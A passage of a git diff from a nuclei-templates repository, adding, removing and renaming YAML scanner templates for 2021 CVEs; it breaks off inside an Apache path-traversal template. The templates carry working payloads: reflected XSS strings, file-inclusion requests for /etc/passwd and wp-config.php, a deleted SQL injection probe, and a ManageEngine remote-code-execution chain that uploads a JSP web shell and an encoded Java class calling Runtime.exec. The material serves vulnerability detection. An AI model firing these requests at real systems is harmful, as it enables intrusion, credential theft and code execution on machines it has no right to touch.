Manager prior to v3.3.3 Reflected XSS + author: dwisiswant0 + severity: medium + description: | + QSAN Storage Manager header page parameters does not filter special characters. + Remote attackers can inject JavaScript without logging in and launch + reflected XSS attacks to access and modify specific data. + reference: + - https://www.twcert.org.tw/tw/cp-132-4962-44cd2-1.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-37216 + cwe-id: CWE-79 + tags: cve,cve2021,xss,qsan,storage + +requests: + - method: GET + path: + - "{{BaseURL}}/http_header.php" + headers: + X-Trigger-XSS: "" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - '"HTTP_X_TRIGGER_XSS":""' + + - type: word + part: header + words: + - "text/html" + + - type: dsl + dsl: + - "!contains(tolower(all_headers), 'x-xss-protection')" diff --git a/nuclei-templates/CVE-2021/cve-2021-37416.yaml b/nuclei-templates/CVE-2021/cve-2021-37416.yaml new file mode 100644 index 0000000000..16c783a632 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-37416.yaml @@ -0,0 +1,45 @@ +id: CVE-2021-37416 + +info: + name: Zoho ManageEngine ADSelfService Plus <=6103 - Cross-Site Scripting + author: edoardottt + severity: medium + description: Zoho ManageEngine ADSelfService Plus 6103 and prior contains a reflected cross-site scripting vulnerability on the loadframe page. + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37416 + - https://blog.stmcyber.com/vulns/cve-2021-37416/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-37416 + tags: cve,cve2021,zoho,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-37416 + cwe-id: CWE-79 + metadata: + shodan-query: http.title:"ManageEngine" + verified: true + +requests: + - method: GET + path: + - "{{BaseURL}}/LoadFrame?frame_name=x&src=x&single_signout=x%27%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C/script%3E" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: header + words: + - "text/html" + + - type: word + part: body + words: + - ">" + - "adsf/js/" + condition: and + +# Enhanced by mp on 2022/08/28 diff --git a/nuclei-templates/CVE-2021/CVE-2021-37580.yaml b/nuclei-templates/CVE-2021/cve-2021-37580.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-37580.yaml rename to nuclei-templates/CVE-2021/cve-2021-37580.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-37589.yaml b/nuclei-templates/CVE-2021/cve-2021-37589.yaml deleted file mode 100644 index b735f46aaf..0000000000 --- a/nuclei-templates/CVE-2021/cve-2021-37589.yaml +++ /dev/null @@ -1,62 +0,0 @@ -id: CVE-2021-37589 - -info: - name: Virtua Software Cobranca <12R - Blind SQL Injection - author: princechaddha - severity: high - description: | - Virtua Cobranca before 12R allows blind SQL injection on the login page. - reference: - - https://github.com/luca-regne/my-cves/tree/main/CVE-2021-37589 - - https://www.virtuasoftware.com.br/ - - https://www.virtuasoftware.com.br/conteudo.php?content=downloads&lang=pt-br - - https://nvd.nist.gov/vuln/detail/CVE-2021-37589 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2021-37589 - cwe-id: CWE-89 - metadata: - shodan-query: http.favicon.hash:876876147 - verified: "true" - tags: cve,cve2021,virtua,sqli - -requests: - - raw: - - | - POST /controller/origemdb.php?idselorigem=ATIVOS HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - - - | - POST /controller/login.php?acao=autenticar HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - X-Requested-With: XMLHttpRequest - - idusuario='&idsenha=test&tipousr=Usuario - - - | - POST /controller/login.php?acao=autenticar HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - X-Requested-With: XMLHttpRequest - - idusuario=''&idsenha=a&tipousr=Usuario - - cookie-reuse: true - req-condition: true - matchers-condition: and - matchers: - - - type: dsl - dsl: - - 'contains(body_3, "Os parametros não estão informados corretamente")' - - 'contains(body_3, "O CNPJ dos parametro não está informado corretamente")' - condition: or - - - type: dsl - dsl: - - "status_code_2 == 500 && status_code_3 == 200" - -# Enhanced by mp on 2022/06/30 diff --git a/nuclei-templates/CVE-2021/cve-2021-37704.yaml b/nuclei-templates/CVE-2021/cve-2021-37704.yaml new file mode 100644 index 0000000000..b5147f128a --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-37704.yaml @@ -0,0 +1,45 @@ +id: CVE-2021-37704 + +info: + name: phpinfo Resource Exposure + author: whoever + severity: medium + description: phpinfo() is susceptible to resource exposure in unprotected composer vendor folders via phpfastcache/phpfastcache. + reference: + - https://github.com/PHPSocialNetwork/phpfastcache/pull/813 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37704 + - https://github.com/PHPSocialNetwork/phpfastcache/security/advisories/GHSA-cvh5-p6r6-g2qc + - https://packagist.org/packages/phpfastcache/phpfastcache + - https://github.com/PHPSocialNetwork/phpfastcache/blob/master/CHANGELOG.md#807 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.3 + cve-id: CVE-2021-37704 + cwe-id: CWE-668 + tags: cve,cve2021,exposure,phpfastcache,phpinfo + +requests: + - method: GET + path: + - "{{BaseURL}}/vendor/phpfastcache/phpfastcache/docs/examples/phpinfo.php" + - "{{BaseURL}}/vendor/phpfastcache/phpfastcache/examples/phpinfo.php" + + matchers-condition: and + matchers: + - type: word + words: + - "PHP Extension" + - "PHP Version" + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - '>PHP Version <\/td>([0-9.]+)' + +# Enhanced by mp on 2022/03/30 diff --git a/nuclei-templates/CVE-2021/cve-2021-37833.yaml b/nuclei-templates/CVE-2021/cve-2021-37833.yaml new file mode 100644 index 0000000000..f76398eeb8 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-37833.yaml @@ -0,0 +1,43 @@ +id: CVE-2021-37833 + +info: + name: Hotel Druid 3.0.2 XSS + author: pikpikcu + severity: medium + description: Reflected cross-site scripting (XSS) vulnerability exists in multiple pages in version 3.0.2 of the Hotel Druid application that allows for arbitrary execution of JavaScript commands. + reference: + - https://github.com/dievus/CVE-2021-37833 + - https://nvd.nist.gov/vuln/detail/CVE-2021-37833 + - https://www.hoteldruid.com + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-37833 + cwe-id: CWE-79 + tags: cve,cve2021,hoteldruid,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/visualizza_tabelle.php?anno=2021&tipo_tabella=prenotazioni&sel_tab_prenota=tutte&wo03b%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ew5px3=1' + - '{{BaseURL}}/storia_soldi.php?piu17%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ee3esq=1' + - '{{BaseURL}}/tabella.php?jkuh3%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Eyql8b=1' + - '{{BaseURL}}/crea_modelli.php?anno=2021&id_sessione=&fonte_dati_conn=attuali&T_PHPR_DB_TYPE=postgresql&T_PHPR_DB_NAME=%C2%9E%C3%A9e&T_PHPR_DB_HOST=localhost&T_PHPR_DB_PORT=5432&T_PHPR_DB_USER=%C2%9E%C3%A9e&T_PHPR_DB_PASS=%C2%9E%C3%A9e&T_PHPR_LOAD_EXT=NO&T_PHPR_TAB_PRE=%C2%9E%C3%A9e&anno_modello=2021&lingua_modello=en&cambia_frasi=SIipq85%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ef9xkbujgt24&form_availability_calendar_template=1' + + stop-at-first-match: true + matchers-condition: and + matchers: + + - type: word + words: + - '' + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2021/cve-2021-38702.yaml b/nuclei-templates/CVE-2021/cve-2021-38702.yaml new file mode 100644 index 0000000000..4c1fde131c --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-38702.yaml @@ -0,0 +1,39 @@ +id: CVE-2021-38702 + +info: + name: Cyberoam NetGenie Cross-Site Scripting + author: geeknik + severity: medium + description: Cyberoam NetGenie C0101B1-20141120-NG11VO devices through 2021-08-14 are susceptible to reflected cross-site scripting via the 'u' parameter of ft.php. + reference: + - https://seclists.org/fulldisclosure/2021/Aug/20 + - https://nvd.nist.gov/vuln/detail/CVE-2021-38702 + - http://www.cyberoamworks.com/NetGenie-Home.asp + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-38702 + cwe-id: CWE-79 + tags: cve,cve2021,cyberoam,netgenie,xss,router + +requests: + - method: GET + path: + - "{{BaseURL}}/tweb/ft.php?u=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + + - type: word + words: + - "text/html" + part: header + + - type: status + status: + - 200 + +# Enhanced by cs on 2022/04/01 diff --git a/nuclei-templates/CVE-2021/cve-2021-39312.yaml b/nuclei-templates/CVE-2021/cve-2021-39312.yaml new file mode 100644 index 0000000000..15ebd64523 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-39312.yaml @@ -0,0 +1,44 @@ +id: CVE-2021-39312 + +info: + name: WordPress True Ranker <2.2.4 - Local File Inclusion + author: DhiyaneshDK + severity: high + description: WordPress True Ranker before version 2.2.4 allows sensitive configuration files such as wp-config.php, to be accessed via the src parameter found in the ~/admin/vendor/datatables/examples/resources/examples.php file via local file inclusion. + reference: + - https://wpscan.com/vulnerability/d48e723c-e3d1-411e-ab8e-629fe1606c79 + - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39312 + - https://plugins.trac.wordpress.org/browser/seo-local-rank/tags/2.2.2/admin/vendor/datatables/examples/resources/examples.php + - https://nvd.nist.gov/vuln/detail/CVE-2021-39312 + remediation: Fixed in version 2.2.4 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2021-39312 + cwe-id: CWE-22,CWE-22 + tags: unauth,lfr,wpscan,cve,cve2021,wp-plugin,lfi,wp,wordpress + +requests: + - raw: + - | + POST /wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + src=%2Fscripts%2Fsimple.php%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "DB_NAME" + - "DB_PASSWORD" + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/06/30 diff --git a/nuclei-templates/CVE-2021/CVE-2021-39316.yaml b/nuclei-templates/CVE-2021/cve-2021-39316.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-39316.yaml rename to nuclei-templates/CVE-2021/cve-2021-39316.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-39327.yaml b/nuclei-templates/CVE-2021/cve-2021-39327.yaml new file mode 100644 index 0000000000..f78e4f755b --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-39327.yaml @@ -0,0 +1,43 @@ +id: CVE-2021-39327 + +info: + name: WordPress BulletProof Security 5.1 Information Disclosure + author: geeknik + severity: medium + description: The BulletProof Security WordPress plugin is vulnerable to sensitive information disclosure due to a file path disclosure in the publicly accessible ~/db_backup_log.txt file which grants attackers the full path of the site, in addition to the path of database backup files. This affects versions up to, and including, 5.1. + reference: + - https://packetstormsecurity.com/files/164420/wpbulletproofsecurity51-disclose.txt + - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39327 + - https://nvd.nist.gov/vuln/detail/CVE-2021-39327 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2021-39327 + cwe-id: CWE-200 + tags: cve,cve2021,wordpress,exposures + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/bps-backup/logs/db_backup_log.txt' + - '{{BaseURL}}/wp-content/plugins/bulletproof-security/admin/htaccess/db_backup_log.txt' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'BPS DB BACKUP LOG' + - '==================' + condition: and + + - type: status + status: + - 200 + + - type: word + part: header + words: + - 'text/plain' + +# Enhanced by mp on 2022/03/23 diff --git a/nuclei-templates/CVE-2021/CVE-2021-39433.yaml b/nuclei-templates/CVE-2021/cve-2021-39433.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-39433.yaml rename to nuclei-templates/CVE-2021/cve-2021-39433.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-40149.yaml b/nuclei-templates/CVE-2021/cve-2021-40149.yaml deleted file mode 100644 index 9d9700aaaf..0000000000 --- a/nuclei-templates/CVE-2021/cve-2021-40149.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: CVE-2021-40149 - -info: - name: Reolink E1 Zoom Camera <=3.0.0.716 - Private Key Disclosure - author: For3stCo1d - severity: medium - description: | - Reolink E1 Zoom Camera versions 3.0.0.716 and below suffer from a private key (RSA) disclosure vulnerability. - reference: - - https://dl.packetstormsecurity.net/2206-exploits/reolinke1key-disclose.txt - - https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2021-40149.txt - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40149 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 5.9 - cve-id: CVE-2021-40149 - cwe-id: CWE-552 - metadata: - shodan-query: http.title:"Reolink" - verified: "true" - tags: cve,cve2021,reolink,camera,iot,exposure,unauth - -requests: - - method: GET - path: - - "{{BaseURL}}/self.key" - - matchers-condition: and - matchers: - - type: word - words: - - "-----BEGIN RSA PRIVATE KEY-----" - - "-----END RSA PRIVATE KEY----" - condition: and - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/06/30 diff --git a/nuclei-templates/CVE-2021/cve-2021-40150.yaml b/nuclei-templates/CVE-2021/cve-2021-40150.yaml new file mode 100644 index 0000000000..ec5bf726ea --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-40150.yaml @@ -0,0 +1,40 @@ +id: CVE-2021-40150 + +info: + name: Reolink E1 Zoom Camera - Information Disclosure + author: For3stCo1d + severity: high + description: | + The web server of the E1 Zoom camera through 3.0.0.716 discloses its configuration via the /conf/ directory that is mapped to a publicly accessible path. + An unauthenticated attacker can abuse this with network-level access to the camera to download the entire NGINX/FastCGI configurations. + reference: + - https://dl.packetstormsecurity.net/2206-exploits/reolinke1config-disclose.txt + - https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2021-40150.txt + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40150 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2021-40150 + cwe-id: CWE-552 + metadata: + shodan-query: http.title:"Reolink" + verified: "true" + tags: cve,cve2021,reolink,camera,exposure,iot + +requests: + - method: GET + path: + - "{{BaseURL}}/conf/nginx.conf" + + matchers-condition: and + matchers: + - type: word + words: + - "server" + - "listen" + - "fastcgi" + condition: and + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2021/cve-2021-40539.yaml b/nuclei-templates/CVE-2021/cve-2021-40539.yaml new file mode 100644 index 0000000000..685aa50014 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-40539.yaml @@ -0,0 +1,116 @@ +id: CVE-2021-40539 + +info: + name: Zoho ManageEngine ADSelfService Plus v6113 - Unauthenticated Remote Command Execution + author: daffainfo,pdteam + severity: critical + description: Zoho ManageEngine ADSelfService Plus version 6113 and prior are vulnerable to a REST API authentication bypass vulnerability that can lead to remote code execution. + reference: + - https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis + - https://www.synacktiv.com/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html + - https://github.com/synacktiv/CVE-2021-40539 + - https://nvd.nist.gov/vuln/detail/CVE-2021-40539 + remediation: Upgrade to ADSelfService Plus build 6114. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-40539 + cwe-id: CWE-287 + tags: cve,cve2021,rce,ad,intrusive,manageengine + +requests: + + - raw: + - | + POST /./RestAPI/LogonCustomization HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=8b1ab266c41afb773af2e064bc526458 + + --8b1ab266c41afb773af2e064bc526458 + Content-Disposition: form-data; name="methodToCall" + + unspecified + --8b1ab266c41afb773af2e064bc526458 + Content-Disposition: form-data; name="Save" + + yes + --8b1ab266c41afb773af2e064bc526458 + Content-Disposition: form-data; name="form" + + smartcard + --8b1ab266c41afb773af2e064bc526458 + Content-Disposition: form-data; name="operation" + + Add + --8b1ab266c41afb773af2e064bc526458 + Content-Disposition: form-data; name="CERTIFICATE_PATH"; filename="ws.jsp" + + <%@ page import="java.util.*,java.io.*"%> + <%@ page import="java.security.MessageDigest"%> + <% + String cve = "CVE-2021-40539"; + MessageDigest alg = MessageDigest.getInstance("MD5"); + alg.reset(); + alg.update(cve.getBytes()); + byte[] digest = alg.digest(); + StringBuffer hashedpasswd = new StringBuffer(); + String hx; + for (int i=0;i + --8b1ab266c41afb773af2e064bc526458-- + + - | + POST /./RestAPI/LogonCustomization HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=43992a07d9a30213782780204a9f032b + + --43992a07d9a30213782780204a9f032b + Content-Disposition: form-data; name="methodToCall" + + unspecified + --43992a07d9a30213782780204a9f032b + Content-Disposition: form-data; name="Save" + + yes + --43992a07d9a30213782780204a9f032b + Content-Disposition: form-data; name="form" + + smartcard + --43992a07d9a30213782780204a9f032b + Content-Disposition: form-data; name="operation" + + Add + --43992a07d9a30213782780204a9f032b + Content-Disposition: form-data; name="CERTIFICATE_PATH"; filename="Si.class" + + {{hex_decode('CAFEBABE0000003400280D0A000C00160D0A0017001807001908001A08001B08001C08001D08001E0D0A0017001F0700200700210700220100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100083C636C696E69743E01000D0A537461636B4D61705461626C6507002001000D0A536F7572636546696C6501000753692E6A6176610C000D0A000E0700230C002400250100106A6176612F6C616E672F537472696E67010003636D640100022F63010004636F707901000677732E6A737001002A2E2E5C776562617070735C61647373705C68656C705C61646D696E2D67756964655C746573742E6A73700C002600270100136A6176612F696F2F494F457863657074696F6E01000253690100106A6176612F6C616E672F4F626A6563740100116A6176612F6C616E672F52756E74696D6501000D0A67657452756E74696D6501001528294C6A6176612F6C616E672F52756E74696D653B01000465786563010028285B4C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F50726F636573733B0021000B000C0000000000020001000D0A000E0001000F0000001D00010001000000052AB70001B10000000100100000000600010000000200080011000E0001000F00000064000500020000002BB800024B2A08BD000359031204535904120553590512065359061207535907120853B600094CA700044BB10001000000260029000D0A00020010000000120004000000050004000600260007002A00080012000000070002690700130000010014000000020015')}} + --43992a07d9a30213782780204a9f032b-- + + - | + POST /./RestAPI/Connection HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + methodToCall=openSSLTool&action=generateCSR&KEY_LENGTH=1024+-providerclass+Si+-providerpath+%22..%5Cbin%22 + + - | + GET /help/admin-guide/test.jsp HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + + - type: word + words: + - "114f7ce498a54a1be1de1f1e5731d0ea" # MD5 of CVE-2021-40539 + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/04/18 diff --git a/nuclei-templates/CVE-2021/CVE-2021-40868.yaml b/nuclei-templates/CVE-2021/cve-2021-40868.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-40868.yaml rename to nuclei-templates/CVE-2021/cve-2021-40868.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-40875.yaml b/nuclei-templates/CVE-2021/cve-2021-40875.yaml new file mode 100644 index 0000000000..cc9e633024 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-40875.yaml @@ -0,0 +1,41 @@ +id: CVE-2021-40875 + +info: + name: Gurock TestRail Application files.md5 Exposure + author: oscarintherocks + severity: high + description: Improper access control in Gurock TestRail versions < 7.2.0.3014 resulted in sensitive information exposure. A threat actor can access the /files.md5 file on the client side of a Gurock TestRail application, disclosing a full list of application files and the corresponding file paths which can then be tested, and in some cases result in the disclosure of hardcoded credentials, API keys, or other sensitive data. + reference: + - htttps://github.com/SakuraSamuraii/derailed + - https://johnjhacking.com/blog/cve-2021-40875/ + - https://www.gurock.com/testrail/tour/enterprise-edition + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40875 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2021-40875 + cwe-id: CWE-863 + metadata: + shodan-query: https://www.shodan.io/search?query=TestRail + tags: cve,cve2021,exposure,gurock,testrail + +requests: + - method: GET + path: + - "{{BaseURL}}/files.md5" + - "{{BaseURL}}/testrail/files.md5" + + max-size: 1000 # Define response size in bytes to read from server. + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "app/arguments/admin" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/06 diff --git a/nuclei-templates/CVE-2021/CVE-2021-40960.yaml b/nuclei-templates/CVE-2021/cve-2021-40960.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-40960.yaml rename to nuclei-templates/CVE-2021/cve-2021-40960.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-40978.yaml b/nuclei-templates/CVE-2021/cve-2021-40978.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-40978.yaml rename to nuclei-templates/CVE-2021/cve-2021-40978.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-41174.yaml b/nuclei-templates/CVE-2021/cve-2021-41174.yaml new file mode 100644 index 0000000000..348eadf47e --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-41174.yaml @@ -0,0 +1,51 @@ +id: CVE-2021-41174 + +info: + name: Grafana 8.0.0 <= v.8.2.2 Angularjs Rendering Cross-Site Scripting + author: pdteam + severity: medium + description: Grafana is an open-source platform for monitoring and observability. In affected versions if an attacker is able to convince a victim to visit a URL referencing a vulnerable page, arbitrary JavaScript content may be executed within the context of the victim's browser. The user visiting the malicious link must be unauthenticated and the link must be for a page that contains the login button in the menu bar. The url has to be crafted to exploit AngularJS rendering and contain the interpolation binding for AngularJS expressions. + reference: + - https://github.com/grafana/grafana/security/advisories/GHSA-3j9m-hcv9-rpj8 + - https://nvd.nist.gov/vuln/detail/CVE-2021-41174 + - https://github.com/grafana/grafana/commit/3cb5214fa45eb5a571fd70d6c6edf0d729983f82 + - https://github.com/grafana/grafana/commit/31b78d51c693d828720a5b285107a50e6024c912 + remediation: Upgrade to 8.2.3 or higher. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-41174 + cwe-id: CWE-79 + metadata: + shodan-query: title:"Grafana" + tags: cve,cve2021,grafana,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/dashboard/snapshot/%7B%7Bconstructor.constructor(%27alert(document.domain)%27)()%7D%7D?orgId=1" + + skip-variables-check: true + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "Grafana" + - "frontend_boot_js_done_time_seconds" + condition: and + + - type: regex + regex: + - '"subTitle":"Grafana (v8\.(?:(?:1|0)\.[0-9]|2\.[0-2]))' + + extractors: + - type: regex + group: 1 + regex: + - '"subTitle":"Grafana ([a-z0-9.]+)' + +# Enhanced by mp on 2022/03/06 diff --git a/nuclei-templates/CVE-2021/cve-2021-41467.yaml b/nuclei-templates/CVE-2021/cve-2021-41467.yaml new file mode 100644 index 0000000000..d82d191d05 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-41467.yaml @@ -0,0 +1,40 @@ +id: CVE-2021-41467 + +info: + name: JustWriting - Reflected Cross-Site Scripting + author: madrobot + severity: medium + description: A cross-site scripting vulnerability in application/controllers/dropbox.php in JustWriting 1.0.0 and below allow remote attackers to inject arbitrary web script or HTML via the challenge parameter. + reference: + - https://github.com/hjue/JustWriting/issues/106 + - https://nvd.nist.gov/vuln/detail/CVE-2021-41467 + - https://github.com/hjue/JustWriting/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-41467 + cwe-id: CWE-79 + tags: cve,cve2021,justwriting,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/sync/dropbox/download?challenge=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "" + part: body + + - type: word + words: + - "text/html" + part: header + +# Enhanced by mp on 2022/03/07 diff --git a/nuclei-templates/CVE-2021/cve-2021-41569.yaml b/nuclei-templates/CVE-2021/cve-2021-41569.yaml new file mode 100644 index 0000000000..e618bac41d --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-41569.yaml @@ -0,0 +1,35 @@ +id: CVE-2021-41569 + +info: + name: SAS/Internet 9.4 1520 - Local File Inclusion + author: 0x_Akoko + severity: high + description: SAS/Internet 9.4 build 1520 and earlier allows local file inclusion. The samples library (included by default) in the appstart.sas file, allows end-users of the application to access the sample.webcsf1.sas program, which contains user-controlled macro variables that are passed to the DS2CSF macro. + reference: + - https://www.mindpointgroup.com/blog/high-risk-vulnerability-discovery-localfileinclusion-sas + - https://support.sas.com/kb/68/641.html + - https://nvd.nist.gov/vuln/detail/CVE-2021-41569 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2021-41569 + cwe-id: CWE-829 + tags: cve,cve2021,sas,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/broker?csftyp=classic,+ssfile1%3d/etc/passwd&_SERVICE=targetservice&_DEBUG=131&_PROGRAM=sample.webcsf1.sas&sysparm=test&_ENTRY=SAMPLIB.WEBSAMP.PRINT_TO_HTML.SOURCE&BG=%23FFFFFF&DATASET=targetdataset&_DEBUG=131&TEMPFILE=Unknown&style=a+tcolor%3dblue&_WEBOUT=test&bgtype=COLOR" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/07/15 diff --git a/nuclei-templates/CVE-2021/CVE-2021-41649.yaml b/nuclei-templates/CVE-2021/cve-2021-41649.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-41649.yaml rename to nuclei-templates/CVE-2021/cve-2021-41649.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-41878.yaml b/nuclei-templates/CVE-2021/cve-2021-41878.yaml new file mode 100644 index 0000000000..5c1412624c --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-41878.yaml @@ -0,0 +1,40 @@ +id: CVE-2021-41878 + +info: + name: i-Panel Administration System - Reflected Cross-Site Scripting + author: madrobot + severity: medium + description: A reflected cross-site scripting vulnerability exists in the i-Panel Administration System Version 2.0 that enables a remote attacker to execute arbitrary JavaScript code in the browser-based web console. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-41878 + - https://cybergroot.com/cve_submission/2021-1/XSS_i-Panel_2.0.html + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41878 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-41878 + cwe-id: CWE-79 + tags: cve,cve2021,justwriting,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/lostpassword.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "" + part: body + + - type: word + words: + - "text/html" + part: header + +# Enhanced by mp on 2022/02/27 diff --git a/nuclei-templates/CVE-2021/cve-2021-42013.yaml b/nuclei-templates/CVE-2021/cve-2021-42013.yaml new file mode 100644 index 0000000000..f3bc5db893 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-42013.yaml @@ -0,0 +1,51 @@ +id: CVE-2021-42013 + +info: + name: Apache 2.4.49/2.4.50 - Path Traversal and Remote Code Execution + author: nvn1729,0xd0ff9 + severity: critical + description: | + A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49 and 2.4.50. An attacker could use a path traversal 